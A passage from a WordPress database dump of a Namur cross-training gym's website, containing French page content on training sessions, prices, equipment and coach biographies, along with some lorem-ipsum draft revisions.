!\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'publish', 'closed', 'open', '', 'les-seances', '', '', '2013-11-04 16:49:45', '2013-11-04 16:49:45', '', 0, 'http://www.crosstrainingcenter.be/?page_id=11', 0, 'page', '', 0),
(12, 1, '2013-05-23 18:14:43', '2013-05-23 18:14:43', '', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-05-23 18:14:43', '2013-05-23 18:14:43', '', 11, 'http://www.crosstrainingcenter.be/?p=12', 0, 'revision', '', 0),
(39, 1, '2013-06-13 16:23:30', '2013-06-13 16:23:30', '« Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines. Afin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h1><b><span style=\"text-decoration: underline;\">TRX Suspension Training </span></b></h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h1><b><span style=\"text-decoration: underline;\">Kettlebel</span></b></h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h1><b><span style=\"text-decoration: underline;\">ViPR</span></b></h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h1><b><span style=\"text-decoration: underline;\">RIP TRAINER</span></b></h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-13 16:23:30', '2013-06-13 16:23:30', '', 22, 'http://www.crosstrainingcenter.be/?p=39', 0, 'revision', '', 0),
(15, 1, '2013-05-23 18:15:58', '2013-05-23 18:15:58', '', 'Notre philosophie', '', 'publish', 'open', 'open', '', '15', '', '', '2013-11-03 09:49:54', '2013-11-03 09:49:54', '', 0, 'http://www.crosstrainingcenter.be/?p=15', 3, 'nav_menu_item', '', 0),
(16, 1, '2013-05-23 18:15:58', '2013-05-23 18:15:58', '', 'Accueil', '', 'publish', 'open', 'open', '', 'acceuil', '', '', '2013-11-03 09:49:54', '2013-11-03 09:49:54', '', 0, 'http://www.crosstrainingcenter.be/?p=16', 1, 'nav_menu_item', '', 0),
(388, 1, '2013-11-03 08:57:54', '2013-11-03 08:57:54', '<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision-v1', '', '', '2013-11-03 08:57:54', '2013-11-03 08:57:54', '', 214, 'http://www2.crosstrainingcenter.be/214-revision-v1/', 0, 'revision', '', 0),
(17, 1, '2013-05-23 18:13:57', '2013-05-23 18:13:57', '<h1>Prise de RDV :</h1>\r\nblablabla', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-05-23 18:13:57', '2013-05-23 18:13:57', '', 9, 'http://www.crosstrainingcenter.be/?p=17', 0, 'revision', '', 0),
(18, 1, '2013-05-23 18:14:55', '2013-05-23 18:14:55', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-05-23 18:14:55', '2013-05-23 18:14:55', '', 11, 'http://www.crosstrainingcenter.be/?p=18', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(19, 1, '2013-05-23 18:12:43', '2013-05-23 18:12:43', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-23 18:12:43', '2013-05-23 18:12:43', '', 5, 'http://www.crosstrainingcenter.be/?p=19', 0, 'revision', '', 0),
(20, 1, '2013-05-24 14:33:49', '2013-05-24 14:33:49', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'publish', 'closed', 'open', '', 'lequipe', '', '', '2013-11-03 10:12:44', '2013-11-03 10:12:44', '', 0, 'http://www.crosstrainingcenter.be/?page_id=20', 0, 'page', '', 0),
(21, 1, '2013-05-24 14:33:45', '2013-05-24 14:33:45', '', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision', '', '', '2013-05-24 14:33:45', '2013-05-24 14:33:45', '', 20, 'http://www.crosstrainingcenter.be/?p=21', 0, 'revision', '', 0),
(22, 1, '2013-05-24 14:34:07', '2013-05-24 14:34:07', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebell</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet 